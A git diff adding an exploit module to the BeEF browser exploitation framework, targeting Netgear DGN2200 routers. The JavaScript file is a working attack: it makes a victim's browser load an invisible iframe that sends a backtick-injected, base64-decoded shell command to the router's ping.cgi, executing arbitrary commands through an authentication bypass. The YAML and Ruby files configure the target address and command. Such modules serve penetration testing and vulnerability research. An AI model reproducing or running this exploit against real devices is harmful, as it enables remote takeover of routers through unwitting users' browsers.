diff --git a/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js b/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
new file mode 100755
index 000000000..feb44585e
--- /dev/null
+++ b/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost = '<%= @rhost %>'; 
+	var cmd = '<%= Base64.encode64(@cmd).delete("\n") %>';
+	var timeout = 15;
+
+	var netgear_dgn2200_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+	
+	netgear_dgn2200_iframe_<%= @command_id %>.setAttribute('src',"http://" + rhost + "/ping.cgi?IPAddr1=8&IPAddr2=8&IPAddr3=8&IPAddr4=8&ping=Ping&ess_=" + Math.random().toString(36).substring(2,10) + "&ping_IPAddr=`" + beef.encode.base64.decode(cmd) + "`");
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+    
+	cleanup = function() {
+		document.body.removeChild(netgear_dgn2200_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/netgear_dgn2200_cmd_exec/config.yaml b/modules/exploits/router/netgear_dgn2200_cmd_exec/config.yaml
new file mode 100755
index 000000000..294ac1800
--- /dev/null
+++ b/modules/exploits/router/netgear_dgn2200_cmd_exec/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        netgear_dgn2200_cmd_exec:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Netgear DGN2200 Command Execution"
+            description: "This module exploits <a href='http://securitygodmode.blogspot.com/2016/02/netgears-dgn2200-multiple.html'>authentication bypass and command execution vulnerabilities</a> to execute arbitrary commands on Netgear DGN2200 routers."
+            authors: ["0x3d5157636b525761", "bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/router/netgear_dgn2200_cmd_exec/module.rb b/modules/exploits/router/netgear_dgn2200_cmd_exec/module.rb
new file mode 100755
index 000000000..4e0643131
--- /dev/null
+++ b/modules/exploits/router/netgear_dgn2200_cmd_exec/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Netgear_dgn2200_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'IP address', 'value' => '10.0.0.1'},
+			{'name' => 'cmd', 'ui_label' => 'Command to execute', 'value' => ''}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end